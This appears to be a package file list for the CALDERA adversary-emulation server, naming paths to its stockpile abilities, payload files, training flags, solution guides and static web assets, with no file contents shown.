+%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/8adf02e8-6e71-4244-886c-98c402857404.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/8c06ebf8-bacf-486b-bd77-21ba8c5a5777.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/921055f4-5970-4707-909e-62f594234d91.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9b007f62-daa1-44bd-a57d-00c5315ec6fe.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b007fc38-9eb7-4320-92b3-9a3ad3e6ec25.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b6b105b9-41dc-490b-bc5c-80d699b82ce8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c6607391-d02c-44b5-9b13-d3492ca58599.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c7ec57cd-933e-42b6-99a4-e852a9e57a33.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c9be8043-a445-4cbf-b77b-ed7bb007fc7c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/deeac480-5c2a-42b5-90bb-41675ee53c7e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fa4ed735-7006-4451-a578-b516f80e559f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/134b49a3-3f93-41bd-85f4-563eadbb6055.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/315cedf1-4a3a-4015-b63f-149d64bacbbc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/bfff9006-d1fb-46ce-b173-92cb04e9a031.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/ccdb8caf-c69e-424b-b930-551969450c57.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/de52784d-4de6-4d4e-b79e-e7b68fe037fb.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/0821b0b0-7902-4a7b-8052-80bda5a43684.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/3b007f46-23e7-4a11-9c14-e7085b6a754a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/78524da1-f347-4fbb-9295-209f1f408330.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/3734aa1e-c536-42b3-8912-4c91b8bdce90.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/aa6ec4dd-db09-4925-b9b9-43adeb154686.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/665432a4-42e7-4ee1-af19-a9a8c9455d0c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/95ad5d69-563e-477b-802b-4855bfb3be09.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/b7344901-0b02-4ead-baf6-e3f629ed545f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/01c96671-afd3-47d4-8d31-8c116cc0221a.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/01d77744-2515-401a-a497-d9f7241aac3c.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/09ad625e-6cba-490f-afe3-5417e7edb9c6.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/0b73bf34-fc5b-48f7-9194-dce993b915b1.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/50855e29-3b4e-4562-aa55-b3d7f93c26b8.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/564ae20d-778d-4965-93dc-b523be2e2ab4.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/78e7504d-968f-477d-8806-4d6c04b94431.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/bcdbf6b9-14c5-495c-be84-37bce32c312b.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/c724545d-a4cc-492e-8075-2ab9a699c847.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/d6ea4c1e-7959-4eb1-a292-b6fd2b06c73e.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/dbd49a4a-ba2d-40d0-9348-2db24fc4b0b6.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/de07f52d-9928-4071-9142-cb1d3bd851e8.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/e4324b88-8836-4803-b6b7-09b3c6cd4e94.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/e89a10d3-004f-4c15-b0eb-d1ba76a4b67f.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/fbc41624-1052-490c-b5ec-4fd718e2501d.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/0b5636cf-f019-4ec9-aa7c-6e4f55505374.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/0f4c3c67-845e-49a0-927e-90ed33c044e0.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/1a98b8e6-18ce-4617-8cc5-e65a1a9d490e.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/4c28c132-d7d7-4a04-8908-d643b7cb1d58.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/5d3e170e-f1b8-49f9-9ee1-c51605552a08.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/725226e0-45b8-4432-84ee-144d3f37ff8d.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/ddbd1850-5fd7-41d5-a7a1-1b15dac49090.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/eddc8f03-f930-41e7-95ba-33fb87bfed74.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/f98193a0-8b5b-4b5e-a5aa-e8c3adfcd4e6.yml +%%WWWDIR%%/plugins/stockpile/data/payloads/70632d81-bb39-40dd-bfba-cfd1f8196eb6.yml +%%WWWDIR%%/plugins/stockpile/data/planners/254c7035-de7d-4d76-a888-2c09ba594eca.yml +%%WWWDIR%%/plugins/stockpile/data/planners/5bdec528-07ce-44cc-8997-09fe41aa2007.yml +%%WWWDIR%%/plugins/stockpile/data/planners/788107d5-dc1e-4204-9269-38df0186d3e7.yml +%%WWWDIR%%/plugins/stockpile/data/planners/aaa7c857-37a0-4c4a-85f7-4e9f7f30e31a.yml +%%WWWDIR%%/plugins/stockpile/data/planners/f36c34f5-9439-4417-9640-fe83f4b7b12d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/2ccb822c-088a-4664-8976-91be8879bc1d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/4f3325d7-e6f2-4413-892a-60066052189d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/ed32b9c3-9593-4c33-b0db-e2007315096b.yml +%%WWWDIR%%/plugins/stockpile/docs/Exfiltration-How-Tos.md +%%WWWDIR%%/plugins/stockpile/hook.py +%%WWWDIR%%/plugins/stockpile/payloads/Akagi64.exe +%%WWWDIR%%/plugins/stockpile/payloads/Bypass-UAC.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/Emulate-Administrator-Tasks.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/HostingCLRx64.dll +%%WWWDIR%%/plugins/stockpile/payloads/Invoke-MemeKatz.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/Invoke-ReflectivePEInjection.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/basic_scanner.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/bookmark.scpt +%%WWWDIR%%/plugins/stockpile/payloads/debugger.dll +%%WWWDIR%%/plugins/stockpile/payloads/debugger.exe +%%WWWDIR%%/plugins/stockpile/payloads/file_search.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/file_search.sh +%%WWWDIR%%/plugins/stockpile/payloads/invoke-mimi.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/minidump.exe +%%WWWDIR%%/plugins/stockpile/payloads/minidump.go +%%WWWDIR%%/plugins/stockpile/payloads/mission.go +%%WWWDIR%%/plugins/stockpile/payloads/powerview.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/ragdoll.py +%%WWWDIR%%/plugins/stockpile/payloads/reflect.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/scanner.py +%%WWWDIR%%/plugins/stockpile/payloads/sshpass +%%WWWDIR%%/plugins/stockpile/payloads/totallylegit.exe +%%WWWDIR%%/plugins/stockpile/payloads/wifi.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/wifi.sh +%%WWWDIR%%/plugins/stockpile/requirements.txt +%%WWWDIR%%/plugins/stockpile/templates/stockpile.html +%%WWWDIR%%/plugins/training/.eslintrc.js +%%WWWDIR%%/plugins/training/.flake8 +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/training/.github/pull_request_template.md +%%WWWDIR%%/plugins/training/.github/workflows/javascript-lint.yml +%%WWWDIR%%/plugins/training/.gitignore +%%WWWDIR%%/plugins/training/README.md +%%WWWDIR%%/plugins/training/VERSION.txt +%%WWWDIR%%/plugins/training/__init__.py +%%WWWDIR%%/plugins/training/app/base_flag.py +%%WWWDIR%%/plugins/training/app/c_badge.py +%%WWWDIR%%/plugins/training/app/c_certification.py +%%WWWDIR%%/plugins/training/app/c_exam.py +%%WWWDIR%%/plugins/training/app/c_fillinblank.py +%%WWWDIR%%/plugins/training/app/c_flag.py +%%WWWDIR%%/plugins/training/app/c_multiplechoice.py +%%WWWDIR%%/plugins/training/app/c_navigator.py +%%WWWDIR%%/plugins/training/app/errors.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_4.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_5.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_6.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_7.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_4.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_4.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_5.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_6.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_7.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_1a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_1b.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_2a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_2b.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_2c.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_3a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_3b.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4a_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4a_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4b_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4b_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4c_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4c_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5a_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5a_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5b_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5b_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5c_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5c_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5d_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5d_win.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/plugins/compass/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/manx/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/manx/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/plugins/mock/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/response/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/response/flag_1.py +%%WWWDIR%%/plugins/training/app/training_api.py +%%WWWDIR%%/plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml +%%WWWDIR%%/plugins/training/data/abilities/training/586140a1-9755-4996-883d-82a17c7737b2.yml +%%WWWDIR%%/plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml +%%WWWDIR%%/plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml +%%WWWDIR%%/plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml +%%WWWDIR%%/plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml +%%WWWDIR%%/plugins/training/data/adversaries/08619190-9eb5-4f35-97e1-0dafe04e0203.yml +%%WWWDIR%%/plugins/training/data/adversaries/2885d0fe-60a7-469b-9e2e-a46b7be2b4df.yml +%%WWWDIR%%/plugins/training/data/adversaries/2c99958e-36e0-4fab-bcdf-977926a58cd6.yml +%%WWWDIR%%/plugins/training/data/adversaries/72c0b333-f6fe-4fa0-a342-4215e8de3947.yml +%%WWWDIR%%/plugins/training/data/adversaries/890508db-9646-4a2d-8d1a-4ea25b3ce02a.yml +%%WWWDIR%%/plugins/training/data/adversaries/9fbc7164-9175-4fc6-bb20-9669dc121df8.yml +%%WWWDIR%%/plugins/training/data/certifications/8da8f0b3-194a-4eed-95b0-43c1f1b64091.yml +%%WWWDIR%%/plugins/training/data/certifications/9cd5f3a0-765d-45bc-85c2-bc76d4282599.yml +%%WWWDIR%%/plugins/training/data/payloads/phish_email.txt +%%WWWDIR%%/plugins/training/hook.py +%%WWWDIR%%/plugins/training/package-lock.json +%%WWWDIR%%/plugins/training/package.json +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag3.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag4.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag5.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag6.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag7.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag3.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsManxFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsManxFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsMockFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsResponseFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsResponseFlag1.md +%%WWWDIR%%/plugins/training/static/css/markdown.css +%%WWWDIR%%/plugins/training/static/img/badges/advanced.png +%%WWWDIR%%/plugins/training/static/img/badges/adversaries.png +%%WWWDIR%%/plugins/training/static/img/badges/agents.png +%%WWWDIR%%/plugins/training/static/img/badges/atomic.png +%%WWWDIR%%/plugins/training/static/img/badges/attack.png +%%WWWDIR%%/plugins/training/static/img/badges/autonomous.png +%%WWWDIR%%/plugins/training/static/img/badges/compass.png +%%WWWDIR%%/plugins/training/static/img/badges/defaultlock.png +%%WWWDIR%%/plugins/training/static/img/badges/developers.png +%%WWWDIR%%/plugins/training/static/img/badges/gameboard.png +%%WWWDIR%%/plugins/training/static/img/badges/manual.png +%%WWWDIR%%/plugins/training/static/img/badges/manx.png +%%WWWDIR%%/plugins/training/static/img/badges/mock.png +%%WWWDIR%%/plugins/training/static/img/badges/operations.png +%%WWWDIR%%/plugins/training/static/img/badges/response.png +%%WWWDIR%%/plugins/training/static/img/certification.png +%%WWWDIR%%/plugins/training/static/js/alpine.min.js +%%WWWDIR%%/plugins/training/templates/certificate_solution_guide.html +%%WWWDIR%%/plugins/training/templates/flag_solution_guide.html +%%WWWDIR%%/plugins/training/templates/training.html +%%WWWDIR%%/plugins/training/tests/__init__.py +%%WWWDIR%%/plugins/training/tests/app/__init__.py +%%WWWDIR%%/plugins/training/tests/app/flags/advanced/test_flag0.py +%%WWWDIR%%/plugins/training/tests/app/test_badge.py +%%WWWDIR%%/plugins/training/tests/app/test_certification.py +%%WWWDIR%%/requirements-dev.txt +%%WWWDIR%%/requirements.txt +%%WWWDIR%%/server.py +%%WWWDIR%%/sonar-project.properties +%%WWWDIR%%/static/css/basic.css +%%WWWDIR%%/static/css/core.css +%%WWWDIR%%/static/css/file-explorer.css +%%WWWDIR%%/static/css/lib/bulma-tooltip.min.css +%%WWWDIR%%/static/css/lib/custom-bulma.css +%%WWWDIR%%/static/css/lib/custom-bulma.css.map +%%WWWDIR%%/static/css/lib/fa-all.min.css +%%WWWDIR%%/static/css/modal.css +%%WWWDIR%%/static/css/multi-select.css +%%WWWDIR%%/static/css/shared.css +%%WWWDIR%%/static/css/timeline.css +%%WWWDIR%%/static/css/webfonts/fa-brands-400.eot +%%WWWDIR%%/static/css/webfonts/fa-brands-400.svg +%%WWWDIR%%/static/css/webfonts/fa-brands-400.ttf +%%WWWDIR%%/static/css/webfonts/fa-brands-400.woff +%%WWWDIR%%/static/css/webfonts/fa-brands-400.woff2 +%%WWWDIR%%/static/css/webfonts/fa-regular-400.eot +%%WWWDIR%%/static/css/webfonts/fa-regular-400.svg +%%WWWDIR%%/static/css/webfonts/fa-regular-400.ttf +%%WWWDIR%%/static/css/webfonts/fa-regular-400.woff +%%WWWDIR%%/static/css/webfonts/fa-regular-400.woff2 +%%WWWDIR%%/static/css/webfonts/fa-solid-900.eot +%%WWWDIR%%/static/css/webfonts/fa-solid-900.svg +%%WWWDIR%%/static/css/webfonts/fa-solid-900.ttf +%%WWWDIR%%/static/css/webfonts/fa-solid-900.woff +%%WWWDIR%%/static/css/webfonts/fa-solid-900.woff2 +%%WWWDIR%%/static/img/additional-fields.png +%%WWWDIR%%/static/img/back-blue.png +%%WWWDIR%%/static/img/back-grey.jpg +%%WWWDIR%%/static/img/back-red.png +%%WWWDIR%%/static/img/caldera-logo.png +%%WWWDIR%%/static/img/compass.png +%%WWWDIR%%/static/img/contact.png +%%WWWDIR%%/static/img/darwin.png +%%WWWDIR%%/static/img/duk.png +%%WWWDIR%%/static/img/errors.png +%%WWWDIR%%/static/img/executor.png +%%WWWDIR%%/static/img/expand.png +%%WWWDIR%%/static/img/facts.png +%%WWWDIR%%/static/img/favicon.png +%%WWWDIR%%/static/img/file.png +%%WWWDIR%%/static/img/folder.png +%%WWWDIR%%/static/img/group.png +%%WWWDIR%%/static/img/hacker.png +%%WWWDIR%%/static/img/linux.png +%%WWWDIR%%/static/img/obfuscation.png +%%WWWDIR%%/static/img/operation.png +%%WWWDIR%%/static/img/payload.png +%%WWWDIR%%/static/img/planner.png +%%WWWDIR%%/static/img/planners.png +%%WWWDIR%%/static/img/plus.png +%%WWWDIR%%/static/img/recycle.png +%%WWWDIR%%/static/img/success.png +%%WWWDIR%%/static/img/switch.png +%%WWWDIR%%/static/img/weather.jpg +%%WWWDIR%%/static/img/windows.png +%%WWWDIR%%/static/img/x.png +%%WWWDIR%%/static/jquery/images/ui-icons_444444_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_555555_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_777620_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_777777_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_cc0000_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_ffffff_256x240.png +%%WWWDIR%%/static/jquery/jquery.js +%%WWWDIR%%/static/jquery/jquery.min.js +%%WWWDIR%%/static/jquery/jquery.multi-select.js +%%WWWDIR%%/static/js/ability.js +%%WWWDIR%%/static/js/core.js +%%WWWDIR%%/static/js/lib/alpine.min.js +%%WWWDIR%%/static/js/lib/bulma-toast.min.js +%%WWWDIR%%/static/js/lib/confetti.browser.min.js +%%WWWDIR%%/static/js/lib/muuri.min.js +%%WWWDIR%%/static/js/shared.js +%%WWWDIR%%/static/scss/bulma/bulma.sass +%%WWWDIR%%/static/scss/bulma/sass/base/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/base/animations.sass +%%WWWDIR%%/static/scss/bulma/sass/base/generic.sass +%%WWWDIR%%/static/scss/bulma/sass/base/helpers.sass +%%WWWDIR%%/static/scss/bulma/sass/base/minireset.sass +%%WWWDIR%%/static/scss/bulma/sass/components/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/components/breadcrumb.sass 